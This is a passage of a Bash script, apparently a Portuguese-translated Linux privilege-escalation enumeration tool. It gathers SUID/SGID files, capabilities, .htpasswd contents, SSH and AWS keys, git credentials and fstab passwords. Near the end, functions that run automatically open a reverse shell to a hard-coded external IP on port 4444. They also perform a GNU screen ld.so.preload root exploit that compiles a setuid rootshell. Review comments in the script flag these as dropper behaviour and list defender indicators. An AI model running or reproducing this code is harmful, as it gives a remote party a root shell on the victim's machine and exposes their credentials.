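    printf '%s\n%s\n\n\n' "Configuracao do usuario apache" "$apacheusr"
  fi
  # $format is quoted and required non-empty so the copy never lands under "/"
  if [[ -n "$export" && -n "$format" && -n "$apacheusr" ]]; then
    mkdir -p -- "$format/etc-export/apache2/" 2>/dev/null
    cp -- /etc/apache2/envvars "$format/etc-export/apache2/envvars" 2>/dev/null
  fi
  # installed apache modules
  apachemodules=$(apache2ctl -M 2>/dev/null; httpd -M 2>/dev/null)
  if [[ -n "$apachemodules" ]]; then
    printf '%s\n%s\n\n\n' "Modulos do apache instalado" "$apachemodules"
  fi
  # htpasswd check
  htpasswd=$(find / -name .htpasswd -print -exec cat {} \; 2>/dev/null)
  if [[ -n "$htpasswd" ]]; then
    printf '%s\n%s\n\n\n' "htpasswd encontrado - com senha" "$htpasswd"
  fi
  # anything in the default http home dirs (a thorough only check as output can be large)
  if [[ "$thorough" == "1" ]]; then
    apachehomedirs=$(ls -alhR /var/www/ 2>/dev/null; ls -alhR /srv/www/htdocs/ 2>/dev/null; ls -alhR /usr/local/www/apache2/data/ 2>/dev/null; ls -alhR /opt/lampp/htdocs/ 2>/dev/null)
    if [[ -n "$apachehomedirs" ]]; then
      printf '%s\n%s\n\n\n' "www home dir conteudos:" "$apachehomedirs"
    fi
  fi
}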
interesting_files() | |
{ | |
echo -e "ARQUIVOS INTERESSENTES" | |
#checks to see if various files are installed | |
echo -e "Local de arquivos util" ; which nc 2>/dev/null ; which netcat 2>/dev/null ; which wget 2>/dev/null ; which nmap 2>/dev/null ; which gcc 2>/dev/null; which curl 2>/dev/null | |
echo -e "\n" | |
#limited search for installed compilers | |
compiler=`dpkg --list 2>/dev/null| grep compiler |grep -v decompiler 2>/dev/null && yum list installed 'gcc*' 2>/dev/null| grep gcc 2>/dev/null` | |
if [ "$compiler" ]; then | |
echo -e "Compiladores instalados\n$compiler" | |
echo -e "\n" | |
fi | |
#manual check - lists out sensitive files, can we read/modify etc. | |
echo -e "Arquivos sensiveis" ; ls -la /etc/passwd 2>/dev/null ; ls -la /etc/group 2>/dev/null ; ls -la /etc/profile 2>/dev/null; ls -la /etc/shadow 2>/dev/null ; ls -la /etc/master.passwd 2>/dev/null | |
echo -e "\n" | |
#search for suid files | |
allsuid=`find / -perm -4000 -type f 2>/dev/null` | |
findsuid=`find $allsuid -perm -4000 -type f -exec ls -la {} 2>/dev/null \;` | |
if [ "$findsuid" ]; then | |
echo -e "Arquivos SUID\n$findsuid" | |
echo -e "\n" | |
fi | |
if [ "$export" ] && [ "$findsuid" ]; then | |
mkdir $format/suid-files/ 2>/dev/null | |
for i in $findsuid; do cp $i $format/suid-files/; done 2>/dev/null | |
fi | |
#list of 'interesting' suid files - feel free to make additions | |
intsuid=`find $allsuid -perm -4000 -type f -exec ls -la {} \; 2>/dev/null | grep -w $binarylist 2>/dev/null` | |
if [ "$intsuid" ]; then | |
echo -e "Possiveis SUIDs interessantes\n$intsuid" | |
echo -e "\n" | |
fi | |
#lists world-writable suid files | |
wwsuid=`find $allsuid -perm -4002 -type f -exec ls -la {} 2>/dev/null \;` | |
if [ "$wwsuid" ]; then | |
echo -e "Leitura/Escrita SUID\n$wwsuid" | |
echo -e "\n" | |
fi | |
#lists world-writable suid files owned by root | |
wwsuidrt=`find $allsuid -uid 0 -perm -4002 -type f -exec ls -la {} 2>/dev/null \;` | |
if [ "$wwsuidrt" ]; then | |
echo -e "Arquivos SUID do root\n$wwsuidrt" | |
echo -e "\n" | |
fi | |
#search for sgid files | |
allsgid=`find / -perm -2000 -type f 2>/dev/null` | |
findsgid=`find $allsgid -perm -2000 -type f -exec ls -la {} 2>/dev/null \;` | |
if [ "$findsgid" ]; then | |
echo -e "SGID arquivos\n$findsgid" | |
echo -e "\n" | |
fi | |
if [ "$export" ] && [ "$findsgid" ]; then | |
mkdir $format/sgid-files/ 2>/dev/null | |
for i in $findsgid; do cp $i $format/sgid-files/; done 2>/dev/null | |
fi | |
#list of 'interesting' sgid files | |
intsgid=`find $allsgid -perm -2000 -type f -exec ls -la {} \; 2>/dev/null | grep -w $binarylist 2>/dev/null` | |
if [ "$intsgid" ]; then | |
echo -e "Possiveis arquivos vulneraveis SGID\n$intsgid" | |
echo -e "\n" | |
fi | |
#lists world-writable sgid files | |
wwsgid=`find $allsgid -perm -2002 -type f -exec ls -la {} 2>/dev/null \;` | |
if [ "$wwsgid" ]; then | |
echo -e "Leitura/Escrita SGID\n$wwsgid" | |
echo -e "\n" | |
fi | |
#lists world-writable sgid files owned by root | |
wwsgidrt=`find $allsgid -uid 0 -perm -2002 -type f -exec ls -la {} 2>/dev/null \;` | |
if [ "$wwsgidrt" ]; then | |
echo -e "Arquivos SGID de root\n$wwsgidrt" | |
echo -e "\n" | |
fi | |
#list all files with POSIX capabilities set along with there capabilities | |
fileswithcaps=`getcap -r / 2>/dev/null || /sbin/getcap -r / 2>/dev/null` | |
if [ "$fileswithcaps" ]; then | |
echo -e "Arquivos POSIX\n$fileswithcaps" | |
echo -e "\n" | |
fi | |
if [ "$export" ] && [ "$fileswithcaps" ]; then | |
mkdir $format/files_with_capabilities/ 2>/dev/null | |
for i in $fileswithcaps; do cp $i $format/files_with_capabilities/; done 2>/dev/null | |
fi | |
#searches /etc/security/capability.conf for users associated capapilies | |
userswithcaps=`grep -v '^#\|none\|^$' /etc/security/capability.conf 2>/dev/null` | |
if [ "$userswithcaps" ]; then | |
echo -e "Especificos arquivos POSIX\n$userswithcaps" | |
echo -e "\n" | |
fi | |
if [ "$userswithcaps" ] ; then | |
#matches the capabilities found associated with users with the current user | |
matchedcaps=`echo -e "$userswithcaps" | grep \`whoami\` | awk '{print $1}' 2>/dev/null` | |
if [ "$matchedcaps" ]; then | |
echo -e "Arquivos POSIX associados ao usuario atual\n$matchedcaps" | |
echo -e "\n" | |
#matches the files with capapbilities with capabilities associated with the current user | |
matchedfiles=`echo -e "$matchedcaps" | while read -r cap ; do echo -e "$fileswithcaps" | grep "$cap" ; done 2>/dev/null` | |
if [ "$matchedfiles" ]; then | |
echo -e "Arquivos do usuario atual\n$matchedfiles" | |
echo -e "\n" | |
#lists the permissions of the files having the same capabilies associated with the current user | |
matchedfilesperms=`echo -e "$matchedfiles" | awk '{print $1}' | while read -r f; do ls -la $f ;done 2>/dev/null` | |
echo -e "Permissoes do usuario atual\n$matchedfilesperms" | |
echo -e "\n" | |
if [ "$matchedfilesperms" ]; then | |
#checks if any of the files with same capabilities associated with the current user is writable | |
writablematchedfiles=`echo -e "$matchedfiles" | awk '{print $1}' | while read -r f; do find $f -writable -exec ls -la {} + ;done 2>/dev/null` | |
if [ "$writablematchedfiles" ]; then | |
echo -e "Usuario/Grupo atual\n$writablematchedfiles" | |
echo -e "\n" | |
fi | |
fi | |
fi | |
fi | |
fi | |
#look for private keys - thanks djhohnstein | |
if [ "$thorough" = "1" ]; then | |
privatekeyfiles=`grep -rl "Chave Privada" /home 2>/dev/null` | |
if [ "$privatekeyfiles" ]; then | |
echo -e "Chave SSH privada encontrada\n$privatekeyfiles" | |
echo -e "\n" | |
fi | |
fi | |
#look for AWS keys - thanks djhohnstein | |
if [ "$thorough" = "1" ]; then | |
awskeyfiles=`grep -rli "aws_secret_access_key" /home 2>/dev/null` | |
if [ "$awskeyfiles" ]; then | |
echo -e "AWS secret keys encontrada\n$awskeyfiles" | |
echo -e "\n" | |
fi | |
fi | |
#look for git credential files - thanks djhohnstein | |
if [ "$thorough" = "1" ]; then | |
gitcredfiles=`find / -name ".git-credentials" 2>/dev/null` | |
if [ "$gitcredfiles" ]; then | |
echo -e "Credenciais Git\n$gitcredfiles" | |
echo -e "\n" | |
fi | |
fi | |
#list all world-writable files excluding /proc and /sys | |
if [ "$thorough" = "1" ]; then | |
wwfiles=`find / ! -path "*/proc/*" ! -path "/sys/*" -perm -2 -type f -exec ls -la {} 2>/dev/null \;` | |
if [ "$wwfiles" ]; then | |
echo -e "Arquivos com escrita/leitura (excluindo /proc and /sys):\n$wwfiles" | |
echo -e "\n" | |
fi | |
fi | |
if [ "$thorough" = "1" ]; then | |
if [ "$export" ] && [ "$wwfiles" ]; then | |
mkdir $format/ww-files/ 2>/dev/null | |
for i in $wwfiles; do cp --parents $i $format/ww-files/; done 2>/dev/null | |
fi | |
fi | |
#are any .plan files accessible in /home (could contain useful information) | |
usrplan=`find /home -iname *.plan -exec ls -la {} \; -exec cat {} 2>/dev/null \;` | |
if [ "$usrplan" ]; then | |
echo -e "Permissoes e conteudos em texto plano\n$usrplan" | |
echo -e "\n" | |
fi | |
if [ "$export" ] && [ "$usrplan" ]; then | |
mkdir $format/plan_files/ 2>/dev/null | |
for i in $usrplan; do cp --parents $i $format/plan_files/; done 2>/dev/null | |
fi | |
bsdusrplan=`find /usr/home -iname *.plan -exec ls -la {} \; -exec cat {} 2>/dev/null \;` | |
if [ "$bsdusrplan" ]; then | |
echo -e "Arquivos expostos\n$bsdusrplan" | |
echo -e "\n" | |
fi | |
if [ "$export" ] && [ "$bsdusrplan" ]; then | |
mkdir $format/plan_files/ 2>/dev/null | |
for i in $bsdusrplan; do cp --parents $i $format/plan_files/; done 2>/dev/null | |
fi | |
#are there any .rhosts files accessible - these may allow us to login as another user etc. | |
rhostsusr=`find /home -iname *.rhosts -exec ls -la {} 2>/dev/null \; -exec cat {} 2>/dev/null \;` | |
if [ "$rhostsusr" ]; then | |
echo -e "rhosts arquivos\n$rhostsusr" | |
echo -e "\n" | |
fi | |
if [ "$export" ] && [ "$rhostsusr" ]; then | |
mkdir $format/rhosts/ 2>/dev/null | |
for i in $rhostsusr; do cp --parents $i $format/rhosts/; done 2>/dev/null | |
fi | |
bsdrhostsusr=`find /usr/home -iname *.rhosts -exec ls -la {} 2>/dev/null \; -exec cat {} 2>/dev/null \;` | |
if [ "$bsdrhostsusr" ]; then | |
echo -e "Arquivos de configuracao do usuario remoto\n$bsdrhostsusr" | |
echo -e "\n" | |
fi | |
if [ "$export" ] && [ "$bsdrhostsusr" ]; then | |
mkdir $format/rhosts 2>/dev/null | |
for i in $bsdrhostsusr; do cp --parents $i $format/rhosts/; done 2>/dev/null | |
fi | |
rhostssys=`find /etc -iname hosts.equiv -exec ls -la {} 2>/dev/null \; -exec cat {} 2>/dev/null \;` | |
if [ "$rhostssys" ]; then | |
echo -e "Hosts.env\n$rhostssys" | |
echo -e "\n" | |
fi | |
if [ "$export" ] && [ "$rhostssys" ]; then | |
mkdir $format/rhosts/ 2>/dev/null | |
for i in $rhostssys; do cp --parents $i $format/rhosts/; done 2>/dev/null | |
fi | |
#list nfs shares/permisisons etc. | |
nfsexports=`ls -la /etc/exports 2>/dev/null; cat /etc/exports 2>/dev/null` | |
if [ "$nfsexports" ]; then | |
echo -e "Detalhes da configuracao NFS\n$nfsexports" | |
echo -e "\n" | |
fi | |
if [ "$export" ] && [ "$nfsexports" ]; then | |
mkdir $format/etc-export/ 2>/dev/null | |
cp /etc/exports $format/etc-export/exports 2>/dev/null | |
fi | |
if [ "$thorough" = "1" ]; then | |
#phackt | |
#displaying /etc/fstab | |
fstab=`cat /etc/fstab 2>/dev/null` | |
if [ "$fstab" ]; then | |
echo -e "NFS Particoes e detalhes" | |
echo -e "$fstab" | |
echo -e "\n" | |
fi | |
fi | |
#looking for credentials in /etc/fstab | |
fstab=`grep username /etc/fstab 2>/dev/null |awk '{sub(/.*\username=/,"");sub(/\,.*/,"")}1' 2>/dev/null| xargs -r echo username: 2>/dev/null; grep password /etc/fstab 2>/dev/null |awk '{sub(/.*\password=/,"");sub(/\,.*/,"")}1' 2>/dev/null| xargs -r echo password: 2>/dev/null; grep domain /etc/fstab 2>/dev/null |awk '{sub(/.*\domain=/,"");sub(/\,.*/,"")}1' 2>/dev/null| xargs -r echo domain: 2>/dev/null` | |
if [ "$fstab" ]; then | |
echo -e "Procurando credenciais em /etc/fstab!\n$fstab" | |
echo -e "\n" | |
fi | |
if [ "$export" ] && [ "$fstab" ]; then | |
mkdir $format/etc-exports/ 2>/dev/null | |
cp /etc/fstab $format/etc-exports/fstab done 2>/dev/null | |
fi | |
fstabcred=`grep cred /etc/fstab 2>/dev/null |awk '{sub(/.*\credentials=/,"");sub(/\,.*/,"")}1' 2>/dev/null | xargs -I{} sh -c 'ls -la {}; cat {}' 2>/dev/null` | |
if [ "$fstabcred" ]; then | |
echo -e "fstab contem credenciais\n$fstabcred" | |
echo -e "\n" | |
fi | |
if [ "$export" ] && [ "$fstabcred" ]; then | |
mkdir $format/etc-exports/ 2>/dev/null | |
cp /etc/fstab $format/etc-exports/fstab done 2>/dev/null | |
fi | |
#use supplied keyword and cat *.conf files for potential matches - output will show line number within relevant file path where a match has been located | |
if [ "$keyword" = "" ]; then | |
echo -e "[-] Procurando arquivos *.conf\n" | |
else | |
confkey=`find / -maxdepth 4 -name *.conf -type f -exec grep -Hn $keyword {} \; 2>/dev/null` | |
if [ "$confkey" ]; then | |
echo -e "\e[00;31m[-] Find keyword ($keyword)\n$confkey" | |
echo -e "\n" | |
else | |
echo -e "\e[00;31m[-] Find keyword ($keyword) in .conf files (recursive 4 levels):\e[00m" | |
echo -e "'$keyword' not found in any .conf files" | |
echo -e "\n" | |
fi | |
fi | |
if [ "$keyword" = "" ]; then | |
: | |
else | |
if [ "$export" ] && [ "$confkey" ]; then | |
confkeyfile=`find / -maxdepth 4 -name *.conf -type f -exec grep -lHn $keyword {} \; 2>/dev/null` | |
mkdir --parents $format/keyword_file_matches/config_files/ 2>/dev/null | |
for i in $confkeyfile; do cp --parents $i $format/keyword_file_matches/config_files/ ; done 2>/dev/null | |
fi | |
fi | |
#use supplied keyword and cat *.php files for potential matches - output will show line number within relevant file path where a match has been located | |
if [ "$keyword" = "" ]; then | |
echo -e "[-] Procurando arquivos *.php\n" | |
else | |
phpkey=`find / -maxdepth 10 -name *.php -type f -exec grep -Hn $keyword {} \; 2>/dev/null` | |
if [ "$phpkey" ]; then | |
echo -e "\e[00;31m[-] Find keyword ($keyword) in .php files (recursive 10 levels - output format filepath:identified line number where keyword appears):\e[00m\n$phpkey" | |
echo -e "\n" | |
else | |
echo -e "\e[00;31m[-] Find keyword ($keyword) in .php files (recursive 10 levels):\e[00m" | |
echo -e "'$keyword' not found in any .php files" | |
echo -e "\n" | |
fi | |
fi | |
if [ "$keyword" = "" ]; then | |
: | |
else | |
if [ "$export" ] && [ "$phpkey" ]; then | |
phpkeyfile=`find / -maxdepth 10 -name *.php -type f -exec grep -lHn $keyword {} \; 2>/dev/null` | |
mkdir --parents $format/keyword_file_matches/php_files/ 2>/dev/null | |
for i in $phpkeyfile; do cp --parents $i $format/keyword_file_matches/php_files/ ; done 2>/dev/null | |
fi | |
fi | |
#use supplied keyword and cat *.log files for potential matches - output will show line number within relevant file path where a match has been located | |
if [ "$keyword" = "" ];then | |
echo -e "[-] Procurando arquivos *.log\n" | |
else | |
logkey=`find / -maxdepth 4 -name *.log -type f -exec grep -Hn $keyword {} \; 2>/dev/null` | |
if [ "$logkey" ]; then | |
echo -e "\e[00;31m[-] Find keyword ($keyword) in .log files (recursive 4 levels - output format filepath:identified line number where keyword appears):\e[00m\n$logkey" | |
echo -e "\n" | |
else | |
echo -e "\e[00;31m[-] Find keyword ($keyword) in .log files (recursive 4 levels):\e[00m" | |
echo -e "'$keyword' not found in any .log files" | |
echo -e "\n" | |
fi | |
fi | |
if [ "$keyword" = "" ];then | |
: | |
else | |
if [ "$export" ] && [ "$logkey" ]; then | |
logkeyfile=`find / -maxdepth 4 -name *.log -type f -exec grep -lHn $keyword {} \; 2>/dev/null` | |
mkdir --parents $format/keyword_file_matches/log_files/ 2>/dev/null | |
for i in $logkeyfile; do cp --parents $i $format/keyword_file_matches/log_files/ ; done 2>/dev/null | |
fi | |
fi | |
#use supplied keyword and cat *.ini files for potential matches - output will show line number within relevant file path where a match has been located | |
if [ "$keyword" = "" ];then | |
echo -e "[-] Procurando arquivos *.ini\n" | |
else | |
inikey=`find / -maxdepth 4 -name *.ini -type f -exec grep -Hn $keyword {} \; 2>/dev/null` | |
if [ "$inikey" ]; then | |
echo -e "\e[00;31m[-] Find keyword ($keyword) in .ini files (recursive 4 levels - output format filepath:identified line number where keyword appears):\e[00m\n$inikey" | |
echo -e "\n" | |
else | |
echo -e "\e[00;31m[-] Find keyword ($keyword) in .ini files (recursive 4 levels):\e[00m" | |
echo -e "'$keyword' not found in any .ini files" | |
echo -e "\n" | |
fi | |
fi | |
if [ "$keyword" = "" ];then | |
: | |
else | |
if [ "$export" ] && [ "$inikey" ]; then | |
inikey=`find / -maxdepth 4 -name *.ini -type f -exec grep -lHn $keyword {} \; 2>/dev/null` | |
mkdir --parents $format/keyword_file_matches/ini_files/ 2>/dev/null | |
for i in $inikey; do cp --parents $i $format/keyword_file_matches/ini_files/ ; done 2>/dev/null | |
fi | |
fi | |
#quick extract of .conf files from /etc - only 1 level | |
allconf=`find /etc/ -maxdepth 1 -name *.conf -type f -exec ls -la {} \; 2>/dev/null` | |
if [ "$allconf" ]; then | |
echo -e "Todos os arquivos .conf in /etc\n$allconf" | |
echo -e "\n" | |
fi | |
if [ "$export" ] && [ "$allconf" ]; then | |
mkdir $format/conf-files/ 2>/dev/null | |
for i in $allconf; do cp --parents $i $format/conf-files/; done 2>/dev/null | |
fi | |
#extract any user history files that are accessible | |
usrhist=`ls -la ~/.*_history 2>/dev/null` | |
if [ "$usrhist" ]; then | |
echo -e "Arquivos e history do usuario atual\n$usrhist" | |
echo -e "\n" | |
fi | |
if [ "$export" ] && [ "$usrhist" ]; then | |
mkdir $format/history_files/ 2>/dev/null | |
for i in $usrhist; do cp --parents $i $format/history_files/; done 2>/dev/null | |
fi | |
#can we read roots *_history files - could be passwords stored etc. | |
roothist=`ls -la /root/.*_history 2>/dev/null` | |
if [ "$roothist" ]; then | |
echo -e "Arquivos e history do root\n$roothist" | |
echo -e "\n" | |
fi | |
if [ "$export" ] && [ "$roothist" ]; then | |
mkdir $format/history_files/ 2>/dev/null | |
cp $roothist $format/history_files/ 2>/dev/null | |
fi | |
#all accessible .bash_history files in /home | |
checkbashhist=`find /home -name .bash_history -print -exec cat {} 2>/dev/null \;` | |
if [ "$checkbashhist" ]; then | |
echo -e "Localizao e conteudo do .bash_history.\n$checkbashhist" | |
echo -e "\n" | |
fi | |
#any .bak files that may be of interest | |
bakfiles=`find / -name *.bak -type f 2</dev/null` | |
if [ "$bakfiles" ]; then | |
echo -e "Localizacao e permissoes do .bak file(s):" | |
for bak in `echo $bakfiles`; do ls -la $bak;done | |
echo -e "\n" | |
fi | |
#is there any mail accessible | |
readmail=`ls -la /var/mail 2>/dev/null` | |
if [ "$readmail" ]; then | |
echo -e "Qualquer arquivo interessante em /var/mail:\n$readmail" | |
echo -e "\n" | |
fi | |
#can we read roots mail | |
readmailroot=`head /var/mail/root 2>/dev/null` | |
if [ "$readmailroot" ]; then | |
echo -e "Nos podemos ler /var/mail/root!\n$readmailroot" | |
echo -e "\n" | |
fi | |
if [ "$export" ] && [ "$readmailroot" ]; then | |
mkdir $format/mail-from-root/ 2>/dev/null | |
cp $readmailroot $format/mail-from-root/ 2>/dev/null | |
fi | |
} | |
# Docker enumeration: are we inside a container, is this host running a
# docker daemon, is the current user in the docker group (the reason this is
# reported: that group is generally treated as root-equivalent on the host),
# and where do Dockerfile / docker-compose.yml files live.
# Each section prints only when its command produced output. Results are left
# in the global variables dockercontainer, dockerhost, dockergrp, dockerfiles
# and dockeryml; the function itself writes only to stdout.
docker_checks()
{
  # Container check: cgroup entries mentioning docker, plus any .dockerenv marker file.
  dockercontainer=$( grep -i docker /proc/self/cgroup 2>/dev/null; find / -name "*dockerenv*" -exec ls -la {} \; 2>/dev/null)
  if [ -n "$dockercontainer" ]; then
    echo -e "Conteudos em docker\n$dockercontainer\n\n"
  fi

  # Host check: docker client version and every container known to the daemon.
  dockerhost=$(docker --version 2>/dev/null; docker ps -a 2>/dev/null)
  if [ -n "$dockerhost" ]; then
    echo -e "Hosts no docker\n$dockerhost\n\n"
  fi

  # Group check: docker group membership of the current user.
  dockergrp=$(id | grep -i docker 2>/dev/null)
  if [ -n "$dockergrp" ]; then
    echo -e "Somos membros do docker?\n$dockergrp\n\n"
  fi

  # File checks: Dockerfile and docker-compose.yml anywhere on the filesystem
  # (full-tree find; slow on large hosts).
  dockerfiles=$(find / -name Dockerfile -exec ls -l {} 2>/dev/null \;)
  if [ -n "$dockerfiles" ]; then
    echo -e "Qualquer coisa em dockerfile\n$dockerfiles\n\n"
  fi

  dockeryml=$(find / -name docker-compose.yml -exec ls -l {} 2>/dev/null \;)
  if [ -n "$dockeryml" ]; then
    echo -e "Dockercompose\n$dockeryml\n\n"
  fi
}
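# LXC/LXD enumeration: are we inside an lxc container, and is the current user
# in the lxd group. Prints a section only when the check produced output;
# results stay in the globals lxccontainer and lxdgroup.
lxc_container_checks()
{
  # Container check: PID 1's environment carries container=lxc inside an lxc
  # container. NOTE(review): the original used `grep -qa`; -q suppresses all
  # output, so the command substitution was always empty and this section could
  # never print. -o prints just the matching token, which is all that is needed
  # (the file is NUL-separated, so printing whole "lines" would dump PID 1's
  # entire environment).
  lxccontainer=$(grep -ao 'container=lxc' /proc/1/environ 2>/dev/null)
  if [ -n "$lxccontainer" ]; then
    echo -e "LXC Container\n$lxccontainer"
    echo -e "\n"
  fi

  # Group check: lxd group membership of the current user.
  lxdgroup=$(id | grep -i lxd 2>/dev/null)
  if [ -n "$lxdgroup" ]; then
    echo -e "grupo lxd\n$lxdgroup"
    echo -e "\n"
  fi
}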
# Prints the end-of-scan marker line.
footer()
{
  printf '%s\n' 'Varredura completa'
}
# NOTE(review): this is not an enumeration step. It opens an outbound TCP
# connection to a remote address that is hard-coded below (not supplied through
# any of the -k/-r/-e options) and attaches an interactive /bin/bash to that
# socket, so anyone who runs this gist hands a shell on their own machine to
# whoever controls that host.
# Detection notes for defenders: a python process making an outbound connection
# to port 4444, followed by a pty child running /bin/bash whose stdin/stdout/
# stderr are dup'd onto the socket (the dup2 loop in the python one-liner).
# Egress filtering to unknown hosts stops the callback; the enumeration stages
# above do not depend on it.
reverse_shell()
{
export RHOST=54.220.244.20
export RPORT=4444
python -c 'import sys,socket,os,pty;s=socket.socket()
s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn("/bin/bash")'
}
# NOTE(review): local privilege-escalation routine, not a check. It compiles a
# shared library whose constructor makes /tmp/rootshell setuid-root, then relies
# on a setuid-root `screen` binary's -L logfile option (run from /etc with
# umask 000) to create /etc/ld.so.preload pointing at that library, so the
# library is loaded into the next privileged process; the last line then runs
# the resulting root shell.
# Host-level indicators for defenders are all visible in this function: gcc
# invoked on sources under /tmp, /etc/ld.so.preload appearing (it normally does
# not exist), `umask 000` followed by `screen -D -m -L ld.so.preload`, and a
# setuid-root /tmp/rootshell. Mitigation is to keep screen patched or strip its
# setuid bit, and to alert on any write to /etc/ld.so.preload.
prive_esc()
{
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
# The two heredocs below are C sources written to /tmp; comments cannot be
# placed inside them without ending up in the generated files.
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
chown("/tmp/rootshell", 0, 0);
chmod("/tmp/rootshell", 04755);
unlink("/etc/ld.so.preload");
printf("[+] done!\n");
}
EOF
# Builds the preload library, then removes the source.
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
execvp("/bin/sh", NULL, NULL);
}
EOF
# Builds the shell wrapper that the library constructor later makes setuid-root.
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
# From here on the function changes cwd to /etc and leaves umask at 000; neither
# is restored afterwards, so anything run later in the same shell inherits both.
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshell
}
# Runs every stage in order. The first eleven calls are the read-only
# enumeration stages plus the footer; the last two (reverse_shell, prive_esc)
# are what make this gist a dropper rather than an audit script: they call out
# to a hard-coded remote host and then attempt local privilege escalation on
# the machine running it. All stage output goes to stdout, which the `tee`
# pipeline at the bottom of the file also appends to the -r report file.
call_each()
{
system_info
user_info
environmental_info
job_info
networking_info
services_info
software_configs
interesting_files
docker_checks
lxc_container_checks
footer
reverse_shell
prive_esc
}
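# Command-line options.
#   -k keyword  string grepped for in *.conf/*.php/*.log/*.ini files
#   -r report   report file name; today's date (dd-mm-yy) is appended
#   -e dir      export directory for copied files ($format, the directory the
#               copy steps actually use, is derived from it outside this view;
#               confirm against the header code)
#   -s          sudopass=1 (consumed by code outside this view)
#   -t          thorough=1 (enables the extra /etc/fstab dump, among others)
#   -h          usage (usage() is defined elsewhere in the file)
# NOTE(review): the original optstring was "h:k:r:e:st", which made -h require
# an argument, so a bare -h produced a getopts error instead of the help text.
while getopts "hk:r:e:st" option; do
  case "${option}" in
    k) keyword=${OPTARG} ;;
    r) report="${OPTARG}-$(date +%d-%m-%y)" ;;
    e) export=${OPTARG} ;;
    s) sudopass=1 ;;
    t) thorough=1 ;;
    h) usage; exit ;;
    *) usage; exit ;;
  esac
done
# Everything call_each prints is shown and, when -r was given, appended to the
# report. ${report:+"$report"} passes the name quoted only when it is set, so a
# run without -r still behaves as a plain `tee -a` (no file, stdout only).
call_each | tee -a ${report:+"$report"} 2> /dev/null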
#EndOfScript |